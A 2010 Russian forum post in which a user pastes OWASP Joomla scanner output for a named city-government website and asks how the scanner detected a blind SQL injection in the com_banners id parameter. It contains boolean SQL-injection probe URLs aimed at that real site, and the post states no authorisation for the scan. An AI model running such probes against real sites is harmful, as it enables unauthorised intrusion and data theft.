24.06.2010, 15:12
|
|
Участник форума
Регистрация: 06.02.2006
Сообщений: 177
С нами:
10661593
Репутация:
88
|
|
Делаю сканирование на уязвимости, используя OWASP Joomla! Vulnerability Scanner v0.0.3-a.
Сообщение от None
Target : http://www.city.m ogilev.by
Сообщение от None
~1.0.x joomla.javascript.js revealed 1.0.12
~1.0.x moscode.xml revealed [1.0.14 - 1.0.15]
* The Exact version found is 1.0.12
Если верить скрипту, то
Сообщение от None
# 23
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? Yes
Я не понимаю как он понял, что можно провести Blind SQL в параметре id. |
|
|